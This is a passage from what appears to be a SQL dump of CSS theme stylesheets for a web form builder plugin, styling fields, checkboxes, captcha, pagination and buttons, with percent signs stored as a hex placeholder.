600;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 4px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\nbackground: #E9E9E9;\r\n}\r\ninput[type=\"text\"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #E9E9E9;\r\n}\r\ninput[type=\"password\"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #E9E9E9;\r\n}\r\ntextarea {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #E9E9E9;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/02/02/date.png) no-repeat left 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 11px;\r\n	height: 10px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 1px;\r\n	left: 1px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: rgb(158, 0, 0);\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 4px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #3F3927;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n	font-weight: bold;\r\n}\r\n.page_deactive:nth-child(even) {\r\n	background-color: #EEEEEE;\r\n}\r\n.page_deactive:nth-child(odd) {\r\n	background-color: #EEEEEE;\r\n}\r\n.page_active {\r\n	color: #3F3927;\r\n	cursor: pointer;\r\n	background-color: #CEECE2;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 18px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 17px;\r\n	line-height: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #95D3BE ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #80CEB4 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #95D6C1 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #95D3BE 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #B3E7D6 99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #80CEB4 ), color-stop(49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #95D6C1 ), color-stop(84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #95D3BE ), color-stop(99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #B3E7D6 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #80CEB4 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #95D6C1 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #95D3BE 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #B3E7D6 99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #80CEB4 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #95D6C1 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #95D3BE 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #B3E7D6 99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #80CEB4 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #95D6C1 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #95D3BE 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #B3E7D6 99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\n	background: linear-gradient(to right, #80CEB4 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #95D6C1 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #95D3BE 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #B3E7D6 99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 17px;\r\n	line-height: 17px;\r\n	background-color: #E0DFE0;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -2px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #292929;\r\n	font-weight: bold;\r\nfont-size:13px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 17px;\r\n	height: 17px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}',0),(9,'Theme 03 green','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EEEF;\r\nborder: 1px solid #3A620A;\r\nmargin-bottom: 10px;\r\ncolor: #3A620A;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 0px;\r\n	border: 1px solid #39680B;\r\n	background: #C9FD9C;\r\n	height: 13px;\r\n	width: 13px;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -5px !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\n.ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #C9FD9C !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/03/01/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 32px;\r\n	height: 25px;\r\n	background: url([SITE_ROOT]/images/03/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background-color: #ACABAB;\r\npadding: 2px 15px;\r\nvertical-align: middle;\r\nborder: none;\r\nfont-size: 15px;\r\n}\r\n\r\n\r\n.button-submit {\r\n	background: #3A620A;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #fff;\r\n	border: 2px solid #4A8C08;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 1px 1px #44740E;\r\n	font-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: #D8D6D7;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 2px solid #fff;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px 1px #969495;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #CDD9C3;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/03/01/bg.png);\r\n	text-align: left;\r\n	padding: 10px 20px 10px 50px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: right;\r\n	color: #000;\r\nfont-size: 18px;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 15px;\r\ntext-align: left;\r\nfont-size: 18px;\r\ncolor: #555;\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n	padding: 0px 15px;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	padding: 2px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat left 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n	background-color: #DFDFDF;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #fff;\r\n	background-color: #42810e;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 